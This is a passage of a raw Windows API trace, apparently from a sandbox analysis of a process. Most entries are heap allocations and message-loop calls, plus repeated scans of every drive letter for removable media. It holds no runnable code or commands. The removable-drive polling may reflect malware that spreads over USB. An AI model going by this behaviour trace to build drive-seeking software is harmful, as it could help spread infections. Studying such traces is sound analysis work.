(HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0217.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.162] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.162] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.162] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.163] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.163] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.163] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.163] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.163] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.164] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.164] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.164] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.164] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.164] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.165] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.165] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.165] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.165] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.165] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.166] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.166] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.166] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.166] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.166] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.167] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.167] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.167] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.167] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.168] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0217.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0217.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0217.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.179] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.179] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.179] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.179] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.179] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0217.179] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.179] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.180] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.180] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.180] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.181] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.181] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.181] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.181] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.181] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.181] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.182] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.182] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.182] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.182] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.183] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.183] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.183] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.183] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.184] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.184] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.184] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.184] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.184] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.185] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.185] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.185] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.185] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.186] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.186] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.186] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.186] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.187] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0217.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0217.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0217.188] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0217.188] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.189] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0217.189] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0217.189] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0217.189] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.189] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.190] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.190] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.190] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.190] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.191] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.191] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.191] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.191] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.191] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.191] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.191] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.191] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.192] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.192] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.192] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.192] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.192] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.193] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.193] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.193] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.193] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.193] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.194] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.194] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.194] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.194] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.195] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.195] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.195] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.195] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.195] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.196] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.196] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.196] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0217.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0217.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0217.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0217.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0217.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.198] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.198] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 